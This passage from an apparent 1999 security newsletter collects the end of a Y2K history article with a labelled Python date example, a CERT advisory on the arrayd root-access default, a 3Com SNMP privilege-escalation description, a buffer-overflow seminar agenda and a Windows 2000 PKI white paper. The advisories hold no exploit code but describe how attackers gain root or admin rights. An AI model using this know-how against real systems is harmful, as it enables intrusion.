to express the concept of midnight. It nearly came to blows. 
Harry says Bill was envious of him because he eventually rose above Bill, his former boss, to a position of higher authority in the field of data standards: "He never got over it," Harry says. Bill says Harry was the envious one, ever since the day Bill beat him out for the Department of Defense standards job. "Harry and I interviewed for the same job. Has it occurred to you why I got it and he didn't? He didn't understand standards!" Did too, Harry says. Did not, Bill says. James Gillespie was a computer standards man for the Navy. He worked with both White and Robertson, on ANSI deliberations. He liked them both, he said, but the two men could not get along. "They had a personality conflict that impeded progress," Gillespie said. For some danged reason, the negotiations over computer date lasted a very, very long time. And for some danged reason, nothing very handsome was accomplished. In the end, what was produced was FIPS 4 and ANSI X3.30, neither of which protected the world against Y2K. Today, both Harry and Bill scorn the FIPS 4 and ANSI X3.30 standards as weak and muddled. It may be the only thing in the whole entire world they agree on. File Not Found We've tried to further research this Harry-Bill contretemps. Many of the participants are dead; others' memories are indistinct. Harry says there should be a paper trail showing the Defense Department's complicity in all this--but the official government file on the FIPS 4 document is as thin as leaf. There's no paper trail. Harry suspects chicanery: He theorizes the records were either "shredded or placed where they are not in the public domain." A spokesman for the National Institute of Standards and Technology, keeper of the FIPS files, confirms that other FIPS regulations have bulging folders, but not FIPS 4. He does not know why, but says there is no evidence any larger file ever existed. There is certainly no coverup, he said. 
Ruth Davis is president of the Pymatuning Group, a technical management firm in Alexandria. In the 1970s, she was Harry White's boss at the National Bureau of Standards. She remembers Harry being apoplectic at the intransigence of the Department of Defense on the issue of the four-digit year. But she says she never really blamed DOD. The cost, she said, would have been huge. Davis had once worked for Defense, and understood the necessity of saving space. At times, she said, it was a life-or-death priority. Back then, she said, Defense had to maintain control of rockets during their launches. Calculations had to be made in real time. This required quickness, which required computer memory. They couldn't screw around with four-digit dates. She said it would be wrong to blame any one person at DOD. It was policy, top to bottom. Plus, it made sense. So we can't blame Bill? "You can't blame anyone." Damn. Tomorrow Is Another Day Maybe we're looking at this thing all wrong. Maybe it isn't about people, at all. Maybe it is just about numbers. Maybe, in the early days, there simply never was a good solution to a basic problem of space: A six-digit date was much more economical than eight. Maybe a problem at century's end was unavoidable, since you could not possibly express the date unambiguously in six digits alone. Except, you could. Astronomers do. They deal in distances so vast that light takes millions of years to traverse them. So astronomers are forever having to add and subtract time periods that span centuries. Since the 1700s, they have found a simple way to do this, with a minimum of figuring or adjustment for leap years and the like: They use something called the Julian day number, adapted from the ancient Julian calendar. In this system, the day Jan. 1, 4713 B.C., is arbitrarily taken as Day 0, the beginning of time. And every day thereafter is numbered sequentially, as a single number. For example, Jan.
1, 2000, the day of the presumed Y2K Armageddon, would be Julian Day 2,451,545. In Julian day calculations, there is never a need for Month, Day, or Year. There is no ambiguity about centuries, because there is no century. Julian day numbers are, at least theoretically, the perfect solution to the Y2K problem. The modern Julian day number is seven digits long. But, if you used it in computers, you could safely drop the first one. That abbreviation would eventually create a Y2K-type ambiguity, but that ambiguity would not occur until A.D. 3501, when the Julian date would hit 3,000,000. By then we might all have big, bald heads and no teeth and do our computing telepathically. If the Julian day had been used in computers--it could have been since 1963, when an algorithm was written to perform the conversion automatically--it would have conserved memory. For microprocessor chips, no conversion would even have been necessary; they could have been programmed directly with the Julian date. This was actually considered. Thomas Van Flandern, an astronomer at the University of Maryland, believes that if data processors had adopted the Julian date in 1963, the Y2K problem would not exist. In fact, he says, this was once a hot topic among astronomers. They wanted to recommend it: "There was a lot of discussion about it at the Jet Propulsion Laboratory," he recalls. "But it broke up into small pools." Astronomers simply couldn't get together on it, Van Flandern says. Basic philosophical disputes arose. The movement disintegrated, he says, because it became polarized. On one side were those who wanted to change all calculations, such as expressing all angles not in degrees but in radians. On the other side were people who wanted to change nothing. They fought. Those simply advocating a Julian date for computers were lost in the din. Nothing got done. And the Julian date issue died. So maybe the Y2K problem is about people after all. Nixon's the One? 
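The two encodings the article has now contrasted, FIPS 4's six-digit YYMMDD field and the astronomers' Julian day number (JDN), side by side in Python. This is an added example, not code from the Washington Post article or from anyone quoted in it. The JDN conversions are the standard integer-arithmetic formulas for the proleptic Gregorian calendar; the sample dates (someone born July 18, 1965, checked against January 1, 2000) are constructed for the illustration, and the `pivot` windowing parameter is the usual later Y2K repair, not anything FIPS 4 or ANSI X3.30 defined.

```python
# Added example, not from the original article. Two ways to carry a date:
# FIPS 4's six-digit YYMMDD (century discarded) and a Julian day number
# (a single day count, no month/year/century at all).


def gregorian_to_jdn(year, month, day):
    """Proleptic Gregorian date -> Julian day number (whole days).

    Standard integer formula; 2000-01-01 gives 2451545, the figure the
    article quotes for the 'Y2K Armageddon' day.
    """
    a = (14 - month) // 12
    y = year + 4800 - a
    m = month + 12 * a - 3
    return (day + (153 * m + 2) // 5 + 365 * y
            + y // 4 - y // 100 + y // 400 - 32045)


def jdn_to_gregorian(jdn):
    """Julian day number -> (year, month, day), proleptic Gregorian."""
    a = jdn + 32044
    b = (4 * a + 3) // 146097
    c = a - 146097 * b // 4
    d = (4 * c + 3) // 1461
    e = c - 1461 * d // 4
    m = (5 * e + 2) // 153
    day = e - (153 * m + 2) // 5 + 1
    month = m + 3 - 12 * (m // 10)
    year = 100 * b + d - 4800 + m // 10
    return year, month, day


def parse_yymmdd(text, pivot=None):
    """Decode a FIPS 4 style YYMMDD string into (year, month, day).

    With pivot=None the century is simply not in the data, so 1900 is
    assumed: that assumption IS the Y2K bug. A pivot (e.g. 50) is the
    later 'windowing' repair: YY >= pivot -> 19YY, otherwise 20YY. It only
    moves the cliff; six digits can never hold the century.
    """
    if len(text) != 6 or not text.isdigit():
        raise ValueError("YYMMDD expected, got %r" % (text,))
    yy, mm, dd = int(text[0:2]), int(text[2:4]), int(text[4:6])
    if pivot is None:
        century = 1900
    else:
        century = 1900 if yy >= pivot else 2000
    return century + yy, mm, dd


def age_in_years(birth_yymmdd, today_yymmdd, pivot=None):
    """Whole years between two YYMMDD dates, done as JDN day arithmetic.

    On the JDN line a subtraction is a subtraction: no month tables, no
    leap-year cases. The century mistake, if any, was made in parsing.
    """
    born = gregorian_to_jdn(*parse_yymmdd(birth_yymmdd, pivot))
    today = gregorian_to_jdn(*parse_yymmdd(today_yymmdd, pivot))
    return int((today - born) / 365.2425)


def six_digit_jdn(jdn):
    """The article's suggested six-digit JDN: drop the leading digit.

    Unambiguous for every JDN below 3,000,000; jdn_to_gregorian(3000000)
    says when that runs out (the article's A.D. 3501).
    """
    return jdn % 1000000


if __name__ == "__main__":
    # Constructed sample: born 1965-07-18, evaluated on 2000-01-01.
    print(age_in_years("650718", "000101"))            # -65: the Y2K bug
    print(age_in_years("650718", "000101", pivot=50))  # 34: windowed
    print(jdn_to_gregorian(3000000))                   # when six digits fail
```

`age_in_years("650718", "000101")` comes out at -65 because both dates were silently placed in the 1900s; with `pivot=50` the same data gives 34. `jdn_to_gregorian(3000000)` returns (3501, 8, 15), the first day on which a six-digit JDN would collide with one from the 2,xxx,xxx range.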
We had one more lead on someone to blame. A last-ditch theory. It was a good theory. It promised us a fabulous villain. We were excited. In the early 1970s, Robert Bemer remained bugged, as it were, by the problem of the two-digit year. He discussed it with acquaintances. One of these was Edward David, the science adviser to the president of the United States. Bemer says he urged David to take the matter to the White House. To the president himself, if need be. The president was . . . Richard Nixon. Clearly, this merited further investigation. Edward David is 74. He is president of EED Inc., a computer consulting firm in Bedminster, N.J. Yes, he recalls, Bemer did discuss the two-digit year with him. And yes, David agreed with Bemer that it might be a problem. "I know computers," David says. "I know how stupid computers are." And yes, David says, Bemer urged him to take it up at the highest levels. Did he talk about it with, y'know . . . Nixon? "No." So much for the perfect villain. "I discussed it with my staff," David says. "I discussed it with some other agencies." He certainly talked to people in the Office of Management and Budget, he says, and possibly in John Ehrlichman's office, or George Shultz's. David does not recall names, but he recalls the reaction. People, he says, "wagged their head sagely and said this problem is simply not on the radar screen." In particular, he remembers this fairly universal response: "It's 30 years in the future. We'll be out of office. Leave it to the civil servants. They'll still be here." The Sting of the Bug It's not my problem. It's not on my watch. He's full of crap. They're jerks. He won't listen to reason. She's jealous. What's he trying to pull? Blow it out your airbag. A people problem. No one wanted the Millennium Bug. No one hatched it. But no one bottled it up when they had the chance, and here it is. It's the same way with warfare: No one wants it. Everyone tries to avoid it. And here it is. 
The Y2K problem is not a computer problem, after all. It was not hard-wired into the mechanical brains themselves, as some have contended. It was hard-wired into the human brain. We want to be enlightened. But our wisdom falls victim to greed and hostility and covetousness and expedience. It's human nature. A people problem. We didn't want a people problem. We wanted a person problem. Someone to blame. With Y2K, there is only one fact about which most everyone agrees: It happened in large measure because computers were invented in the center of the century. It was an accident of timing. The first electronic digital computer, ENIAC, was unveiled in 1946. Let's say this had occurred in 1996. The next century would have been right around the corner, barreling at us. Yes, some programs would have been able to ignore it, but the majority would not. Simple mortgages would have had to accommodate the new century. The balance would be tilted. The state of the art would have to be the four-digit date, despite the cost. Few computer experts doubt this. And if computers had been invented in, say, 1912, the same thing would have happened in reverse. The birthdays of 80 percent of the American population would have had to be expressed as part of a previous century. Arithmetic involving ages, dates of employment, home purchases, anything that looked remotely into the past would have similarly had to account for the 1800s. But where does this get us? It's impossible to second-guess the march of progress. Science proceeds at its own pace. Inventions beget other inventions. Computers happened when they were ready to happen. Not before or after. But why did that moment fall at the center of the century? Can the calendar itself be second-guessed? S. Thomas Parker is a professor of history at North Carolina State University. He is an expert on time measurement. We got his name from an Internet search. (Computers. They're magic.) We explain our predicament. 
We need to find someone to blame for the fact that the year 2000 is arriving in six months, and not at some other time. In other words: Why 2K? Parker thinks about this. He consults a book. And finds us our patsy. Dennis the Menace? Most likely, he dressed in coarse brown robes woven from hemp. He was a Scythian monk who lived in Rome in the 6th century A.D. His name was Dionysius Exiguus, which translates, roughly, into "Dennis the Short." Dennis may well have been a small man, but scholars suspect he took the moniker as a sign of humility. Parker explains that before Dennis the Short, time was reckoned in various ways; some figured the date by the number of years since the election of the current pope. The most common system for counting time, however, was dating it from the founding of Rome in what is now considered 753 B.C. Dennis the Short is widely credited with having created the modern calendar. In A.D. 525, he is said to have proposed dating the Christian era from the birth of Jesus, and persuaded the papacy this was a good idea. Dennis calculated this to be the year we now call A.D. 1. It took centuries, but eventually this system was adopted throughout the Christian world. But Dennis was wrong, Parker says. He miscalculated. If the Scriptures are to be believed, Jesus was certainly born during the reign of Herod the First, the king who ordered the death of all male babies in Judea after hearing of the birth of a messiah. Herod died in 4 B.C. That means Jesus was born at least four years earlier than Dennis reckoned. Which means all dates should be four years later than we think. Not good enough. It would not have mattered appreciably if computers had been invented in 1950 instead of 1946. Parker considers this. Well, he asks, why did Dennis the Short fix the start of the Christian era at the birth of Christ? "Resurrection is the true beginning," he says. Good point. Christ died a Jew. His last supper was a seder. 
The Christian era should begin not with his birth but his death. He is thought to have died around A.D. 34, during the latter years of the tenure of Pontius Pilate, Judea's Roman prefect. Shorty turned over the hourglass 34 years too soon! Let's recalculate time. A.D. now means what schoolkids have always thought it meant: After Death. The U.S. was birthed in Philadelphia not in 1776 but 1742. The Civil War began in 1826. The stock market crashed in 1895. And ENIAC debuted in . . . 1912. Pretty soon thereafter, the Department of Defense had a problem. It really, really, wanted to program its computers using a two-digit year. But gosh darn it, this just wasn't practical. Half of all servicemen were born in the previous century. Industry faced similar problems. When they could, programmers still used a two-digit date. But most could not. The four-digit year became the rule, not the exception. Today is Sunday, July 18, 1965. The century will not end for 34 years. But computers will have been programmed correctly. There will be no millennium bug. The Villain, Unmasked It's not Dick Nixon. It's not Bob Bemer. It's not Ed David. It's not Alan Greenspan. It's not Bill. It's not Harry. It's Shorty. He's the one who screwed up. Big time. Special correspondent Bob Massey contributed to this report. © Copyright 1999 The Washington Post Company.

@HWA

45.0 CERT ADVISORY CA-99-09
~~~~~~~~~~~~~~~~~~~~~~

by BHZ, Tuesday 20th July 1999 on 1:45 am CET

CERT has released a new security advisory. "A vulnerability has been discovered in the default configuration of the Array Services daemon, arrayd. Array Services are used to manage a cluster of systems. The default configuration file, arrayd.auth, disables authentication and does not provide adequate protection for systems connected to an untrusted network".
Read the advisory below; CERT Advisory CA-99-09 Array Services default configuration Originally released: July 19, 1999 Source: CERT/CC Systems Affected * IRIX systems running the Array Services daemon * UNICOS systems running the Array Services daemon I. Description A vulnerability has been discovered in the default configuration of the Array Services daemon, arrayd. Array Services are used to manage a cluster of systems. The default configuration file, arrayd.auth, disables authentication and does not provide adequate protection for systems connected to an untrusted network. SGI has published the following document describing the vulnerability and solutions: ftp://sgigate.sgi.com/security/19990701-01-P II. Impact On systems installed with the default configuration, remote and local users can execute arbitrary commands as root. III. Solution Use "SIMPLE" authentication Reconfigure arrayd to use "SIMPLE" authentication. For more information about reconfiguring arrayd, please see the SGI security bulletin. Disable the arrayd daemon If you do not need the capabilities provided by the arrayd daemon, you may wish to disable the daemon. _________________________________________________________________ The CERT Coordination Center would like to thank Yuri Volobuev and the SGI Security Team for their assistance in preparing this advisory. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-99-09-arrayd.html. ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. 
holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/. To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. Copyright 1999 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html. * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. 
Revision History July 19, 1999: Initial release -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBN5N5q3VP+x0t4w7BAQGo1QQApyCUoV27rxMD4w3bOI9Ylvxk0eFnImVf XEpRSW74HHHMyPrBC4mltDYjrwX1gXGHR9WK8E9dSGfJju89vFR1IBrp7fZmARCx YDp1z9XNBAUe/0U2QiW7D/ALfvcVamviSuwAKiZY4ECxL6jtwBF6AYOpEUnOkxYG tiqdDO3EWjY= =Uzpa -----END PGP SIGNATURE----- @HWA 46.0 Tracking Criminals With New Technology ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ via http://www.securityfocus.com/ 21/07/99 14:54 Tracking criminals with new technology Selina Mitchell The Federal Government has called for tenders to build a national crime investigation system. The government has set aside $50 million over three years to establish CrimTrac, which it is hoped will make policing easier across the nation. CrimTrac will be developed in stages, the first being a new and enhanced National Automated Fingerprint Identification System (NAFIS). This should be operational before the Sydney Olympics, said Minister for Justice and Customs, Senator Amanda Vanstone. It would not be sensible to have an old fingerprint system running when so many people would be in the country, she said. "Australia's current fingerprint system has been in place since 1986, and will run out of capacity in 2001. It relies on printers ink technology scarcely changed in one hundred years." The new system will support an inkless process that uses electronic and laser technology, known as livescan. Following this, a national DNA database and a national child sex offender register will be set up. The government is also promising fast access to operational information, including domestic violence orders, missing person and stolen vehicle information. Vanstone could not give an exact timetable for implementation, but did say it would be less than a couple of years. In order to be useful, all states and territories will need to supply information to the databases. 
All relevant governments supported the new technology and if anyone wanted to try to find a police commissioner who didn't like the scheme they would have to pack a very big lunch, Vanstone said. While private industry has been called on to build the system (providing the technology and solutions), it will be run by the public sector. A range of legal and technical safeguards will be employed, she said. CrimTrac's successful tenderer, and anyone working on it, will be subject to Commonwealth privacy laws (the Privacy Act and the Crimes Act). Also, CrimTrac will operate on a need-to-know basis. Access will be provided to authorised officers only. The access control architecture will include secure identification, immediate warning of unauthorised users, access only to relevant data, firewalls and encryption, and audit logs and trails. The CrimTrac tender is in two parts: the urgent replacement of NAFIS and the possible appointment of a long-term systems integrator for the system to work in partnership with the government and police services. That partnership (possibly with further tenders) will set up the other pieces of the CrimTrac system. It is expected that contracts for the new NAFIS will be signed in November, and contracts for the systems integrator will be signed a month later. The request for tender is available from http://www.law.gov.au/. This article is located at http://www.newswire.com.au/9907/tracki.htm @HWA 47.0 3Com HiPer Arcs Community Name Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.securityfocus.com/ On 3Com HiPer Arc cards (and possibly others using the Pilgrim source base), it is possible to gain administrative snmp privileges remotely if you have a valid community string (of any access level). There are three levels of access in the card, read-only, read-write and administrative. 
The community strings are readable at all three access levels, which makes it possible for an attacker holding any valid string to gain administrative privileges (needing only to read the community strings out of the usrSnmpCommAccess table and others like it). With administrative access, the attacker can perform a number of malicious activities possibly leading to further compromise (ie, repopulating the ARP cache). There may be other 3Com devices vulnerable to this attack. There are two workarounds to this problem. The first involves restricting certain community strings to IP address(es). This is only marginally more secure: SNMPv1 runs over UDP, so a source address can be spoofed (a SET needs no reply to do its damage), and the community strings are still readable. The second involves not defining community strings on the Arc at all. To do this, you need the NMC (Network Management Card) to act as a relay to the HiPer Arc. The NMC's community string then takes the form communitystring@entity (ie, public@16000), entity being the location of the Arc (ie, slot 16 = 16000). To send an SNMP command to the Arc, assuming it's in slot 16, and assuming an NMC community string of "public" for example purposes, you'd use the community string "public@16000". The only real drawback to this workaround is the extra load that is put on the NMC cards (many of which are only 486 processor based...none-too-overpowered), and that SNMP operations are slowed down by having to be processed through another system. Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com. First posted to BugTraq by Jeff Mcadams on July 20, 1999. Some of the solution taken directly from Jeff's BugTraq posting.

@HWA

48.0 Aleph One in Tokyo
~~~~~~~~~~~~~~~~~~

Bugtraq moderator Aleph One will be taking his expertise to Tokyo for a three day seminar on 'exploits and how to stop them' ...
here's an excerpt from the itinerary http://www.lac.co.jp/security/seminar/tokyo090899.html

-How to find security holes and how to fix-
Instructor: Aleph One (Bugtraq ML moderator) with interpretation
Date: September 8-10, 1999
Place: TIME24 Building, AOMI 2-45, KOTO-KU, TOKYO, JAPAN
http://www.lac.co.jp/profile/direction_e.html

Aleph One, moderator of the Bugtraq mailing list and well known in the security community, will come to teach us how to discover security holes and how to fix them. You will also learn 'who' finds vulnerabilities and 'who' misuses them. It is a great opportunity to ask Aleph questions face to face in Japan. Our SecureNet Service team will support those who have technical difficulties during the class.

Contents
Wednesday, September 8
 10:00-10:45 What is Bugtraq ML?
 10:45-11:45 What are security holes and who finds them?
 11:45-13:00 Lunch
 13:00-17:00 Typical Linux vulnerabilities
Thursday, September 9
 10:00-11:45 Latest Linux vulnerabilities
 11:45-13:00 Lunch
 13:00-17:00 Latest Linux vulnerabilities
Friday, September 10
 10:00-11:45 Typical SunOS/Solaris vulnerabilities
 11:45-13:00 Lunch
 13:00-17:00 SunOS/Solaris vulnerabilities

Security holes for this class will focus on:
 Remote buffer overflow to get unauthorized privilege
 Local buffer overflow to get root privilege
 Remote unauthorized login through holes

@HWA

49.0 Windows2000 introduces Public Key Encryption
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From OSALL

PKI Encryption In Windows 2000
OSAll Staff

Microsoft has announced that the upcoming release of Windows 2000 will include built-in support for public key encryption. The support will actually be integrated from the ground up in the Windows 2000 security infrastructure. Windows' built-in security has always been notorious for its insecurity. Windows 2000, the successor to Windows NT 4.0, is touted by Microsoft as a more secure operating system.
The integration of public key encryption is another step in that direction, according to Microsoft. Programs like Pretty Good Privacy already allow for public key encryption, but they're not automatic like Microsoft's seems to be. Windows 2000's public key integration is built more as a system for the use of other software than to integrate encryption into Windows 2000 itself.

The white paper detailing the integration of public key encryption in Windows 2000 is mirrored in HTML format on OSAll. The only way to receive this white paper from Microsoft is in self-extracting .DOC format.

http://www.aviary-mag.com/Archive/News/Public_Key_Cryptography_In_Win/PKI_in_Win2k_White_Paper/pki_in_win2k_white_paper.html

White Paper Abstract

Microsoft® Windows® 2000 introduces a comprehensive public-key infrastructure (PKI) to the Windows platform. This infrastructure extends the Windows-based public-key (PK) cryptographic services introduced over the past few years, providing an integrated set of services and administrative tools for creating, deploying, and managing PK-based applications. This allows application developers to take advantage of the shared-secret security mechanisms or PK-based security mechanism in Windows, as appropriate. Enterprises also gain the advantage of being able to manage the environment and applications with consistent tools and policies.

© 1999 Microsoft Corporation. All rights reserved.

The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information presented after the date of publication. This White Paper is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS DOCUMENT.
Microsoft, ActiveX, Authenticode, Outlook, The BackOffice logo, Windows, and Windows NT are registered trademarks of Microsoft Corporation. Other product or company names mentioned herein may be the trademarks of their respective owners.

Microsoft Corporation
One Microsoft Way
Redmond, WA 98052-6399 USA
0499

Contents

Introduction
Concepts
  Public Key Cryptography
  Public-Key Functionality
  Digital Signatures
  Authentication
  Secret Key Agreement via Public Key
  Bulk Data Encryption without Prior Shared Secrets
  Protecting and Trusting Cryptographic Keys
  Certificates
  Certificate Authorities
  Trust and Validation
Windows 2000 PKI Components
Certificate Authorities
  Certificate Hierarchies
  Deploying an Enterprise CA
  Trust In Multiple CA Hierarchies
Enabling Domain Clients
  Generating Keys
  Key Recovery
  Certificate Enrollment
  Renewal
  Using Keys and Certificates
  Recovery
  Roaming
  Revocation
  Trust
PK Security Policy in Windows 2000
  Trusted CA Roots
  Certificate Enrollment and Renewal
  Smart-Card Logon
Applications Overview
  Web Security
  Secure E-mail
  Digitally Signed Content
  Encrypting File System
  Smart-Card Logon
  IP Security (IPSec)
Interoperability
  Criteria
  Internet Standards
Preparing for Windows 2000 PKI
  S/MIME-based E-mail Using Exchange Server
For More Information

Introduction

The Microsoft Windows 2000 operating system introduces a comprehensive public-key infrastructure (PKI) to the Windows platform. This infrastructure extends the Windows-based public-key (PK) cryptographic services that were introduced over the past few years, providing an integrated set of services and administrative tools for creating, deploying, and managing PK-based applications. This allows application developers to take advantage of the shared-secret security mechanisms or PK-based security mechanism, as appropriate.
Enterprises also gain the advantage of being able to manage the environment and applications with consistent tools and policies. The remainder of this paper provides an overview of the PKI in Windows 2000.

Concepts

Public Key Cryptography

Cryptography is the science of protecting data. Cryptographic algorithms mathematically combine input plaintext data and an encryption key to generate encrypted data (ciphertext). With a good cryptographic algorithm, it is computationally not feasible to reverse the encryption process and derive the plaintext data, starting with only the ciphertext; some additional data, a decryption key, is needed to perform the transformation.

In traditional, secret (or symmetric) key cryptography, the encryption and decryption keys are identical and thus share sensitive data. Parties wishing to communicate with secret-key cryptography must securely exchange their encryption/decryption keys before they can exchange encrypted data. In contrast, the fundamental property of public-key (PK) cryptography is that the encryption and decryption keys are different. Encryption with a public key encryption key is a one-way function; plaintext turns into ciphertext, but the encryption key is irrelevant to the decryption process. A different decryption key (related, but not identical, to the encryption key) is needed to turn the ciphertext back into plaintext.

Thus, for PK cryptography, every user has a pair of keys, consisting of a public key and a private key. By making the public key available, it is possible to enable others to send you encrypted data that can only be decrypted using your private key. Similarly, you can transform data using your private key in such a way that others can verify that it originated with you. This latter capability is the basis for digital signatures, discussed below.

Public-Key Functionality

The separation between public and private keys in PK cryptography has allowed the creation of a number of new technologies.
The most important of these are digital signatures, distributed authentication, secret-key agreement via public key, and bulk data encryption without prior shared secrets.

There are a number of well-known PK cryptographic algorithms. Some, such as Rivest-Shamir-Adleman (RSA) and Elliptic Curve Cryptography (ECC), are general-purpose; they can support all of the above operations. Others support only a subset of these capabilities. Some examples include the Digital Signature Algorithm (DSA, which is part of the U.S. government's Digital Signature Standard, FIPS 186), which is useful only for digital signatures, and Diffie-Hellman (D-H), which is used for secret key agreement.

The following sections briefly describe the principal uses of PK cryptography. These operations are described in terms of two users, Bob and Alice. It is assumed that Bob and Alice can exchange information but do not have any pre-arranged, shared secrets between them.

Digital Signatures

Perhaps the most exciting aspect of public key cryptography is creating and validating digital signatures. This is based on a mathematical transform that combines the private key with the data to be signed in such a way that:

- Only someone possessing the private key could have created the digital signature.
- Anyone with access to the corresponding public key can verify the digital signature.
- Any modification of the signed data (even changing only a single bit in a large file) invalidates the digital signature.

Digital signatures are themselves just data, so they can be transported along with the signed data that they protect. For example, Bob can create a signed e-mail message to Alice and send the signature along with the message text, providing Alice the information that is required to verify the message origin. In addition, digital signatures provide a way to verify that data has not been tampered with (either accidentally or intentionally) while in transit from the source to the destination.
Therefore, they can be exploited to provide a very secure data-integrity mechanism.

Authentication

PK cryptography provides robust distributed authentication services. Entity authentication guarantees that the sender of data is the entity that the receiver thinks it is. If Alice receives data from Bob, and then sends him a challenge encrypted with Bob's public key, Bob then decodes this challenge and sends it back to Alice, proving that he has access to the private key associated with the public key that Alice used to issue the challenge.

Alice can also send a plaintext challenge to Bob. Bob then combines the challenge with other information, which is digitally signed. Alice then uses Bob's public key to verify the signature and prove that Bob has the associated private key. The challenge makes this message unique and prevents replay attacks by a hostile third party.

In either case, this is known as a proof-of-possession protocol because the sender proves that he has access to a particular private key.

Secret Key Agreement via Public Key

Another feature of PK cryptography is that it permits two parties to agree on a shared secret, using public, and nonsecure, communication networks. Basically, Bob and Alice each generate a random number that forms half of the shared secret key. Bob then sends his half of the secret, encrypted, to Alice, using her public key. Alice sends her half, encrypted, to Bob with his public key. Each side can then decrypt the message received from the other party, extract the half of the shared secret that was generated by the other, and combine the two halves to create the shared secret. Once the protocol is completed, the shared secret can be used for securing other communications.

Bulk Data Encryption without Prior Shared Secrets

The fourth major technology enabled by PK cryptography is the ability to encrypt bulk data without the establishment of prior shared secrets.
Existing PK algorithms are computationally intensive relative to secret-key algorithms. This makes them ill suited for encrypting large amounts of data. To get the advantages of PK cryptography along with efficient bulk encryption, PK and secret-key technologies are typically combined.

This is accomplished by first selecting a secret-key encryption algorithm and generating a random session key to use for data encryption. If Bob is sending the message, he first encrypts this session key, using Alice's public key. The resulting ciphertext key is then sent to Alice along with the encrypted data. Alice can recover the session key, using her private key, and then use the session key to decrypt the data.

Protecting and Trusting Cryptographic Keys

In secret-key cryptography, Alice and Bob trust their shared-secret key because they mutually agreed on it or exchanged it in a secure manner, and each has agreed to keep it stored securely to prevent access by a malicious third party. In contrast, using PK cryptography, Alice need only protect her private key and Bob, his private key. The only information they need to share is their public keys. They need to be able to positively identify the other's public key, but they need not keep it secret.

This ability to trust the association of a public key with a known entity is critical to the use of PK cryptography. Alice might trust Bob's public key because Bob handed it to Alice directly in a secure manner, but this presupposes that Alice and Bob have had some form of prior secure communication. More likely, Alice has obtained Bob's public key through a nonsecure mechanism (for example, from a public directory), so some other mechanism is needed to give Alice confidence that the public key that she holds claiming to be from Bob really is Bob's public key. One such mechanism is based on certificates issued by a certificate authority (CA).
Certificates

Certificates provide a mechanism for gaining confidence in the relationship between a public key and the entity that owns the corresponding private key. A certificate is a digitally signed statement dealing with a particular subject public key, and the certificate is signed by its issuer (holding another pair of private and public keys). Typically, certificates also contain other information related to the subject public key, such as identity information about the entity that has access to the corresponding private key. Thus, when issuing a certificate, the issuer is attesting to the validity of the binding between the subject public key and the subject identity information.

The most common form of certificates in use today is based on the ITU-T X.509 standard. This is a fundamental technology used in the Windows 2000 PKI. It is, however, not the only form of certificates. Pretty Good Privacy (PGP) secure e-mail, for example, relies on a form of certificates unique to PGP.

Certificate Authorities

A certificate authority (CA) is an entity or service that issues certificates. A CA acts as a guarantor of the binding between the subject public key and the subject identity information that is contained in the certificates it issues. Different CAs may choose to verify that binding through different means, so it is important to understand the authority's policies and procedures before choosing to trust that authority to vouch for public keys.

Trust and Validation

The fundamental question facing Alice when she receives a signed message is whether she should trust that the signature is valid and was made by whoever claimed to make it. Alice can confirm that the signature is mathematically valid; that is, she can verify the integrity of the signature, using a known public key. However, Alice must still determine whether the public key used to verify the signature does, in fact, belong to the entity claiming to have made the signature in the first place.
If Alice does not implicitly trust the public key to be Bob's, she needs to acquire strong evidence that the key belongs to Bob. If Alice can locate a certificate, which was issued by a CA that Alice implicitly trusts, for Bob's public key, Alice can trust that Bob's public key really belongs to Bob. That is, Alice is likely to trust that she really has Bob's public key if she finds a certificate that:

- Has a cryptographically valid signature from its issuer.
- Attests to a binding between the name Bob and Bob's public key.
- Was issued by an issuer that Alice trusts.

Assuming that Alice finds such a certificate for Bob's public key, she can verify its authenticity, using the public key of the issuing CA, Ira. However, Alice is now faced with the same dilemma. How does she know that the public key actually belongs to Ira? Alice now needs to find a certificate attesting to the identity of Ira and the binding between Ira and Ira's public key. Ultimately, Alice ends up constructing a chain of certificates leading from Bob and Bob's public key through a series of CAs and terminating in a certificate issued to someone that Alice implicitly trusts. Such a certificate is called a trusted root certificate because it forms the root (top node) of a hierarchy of public keys/identity bindings that Alice accepts as authentic (see section 4.1, Certificate Hierarchies).

When Alice chooses to explicitly trust a particular trusted root certificate, she is implicitly trusting all the certificates issued by that trusted root, as well as all certificates issued by any subordinate CA certified by the trusted root. The set of trusted root certificates that Alice explicitly trusts is the only information that Alice must acquire in a secure manner. That set of certificates secures Alice's trust system and her belief in the public-key infrastructure.

Windows 2000 PKI Components

Figure 1 presents a top-level view of the components that make up the Windows 2000 PKI.
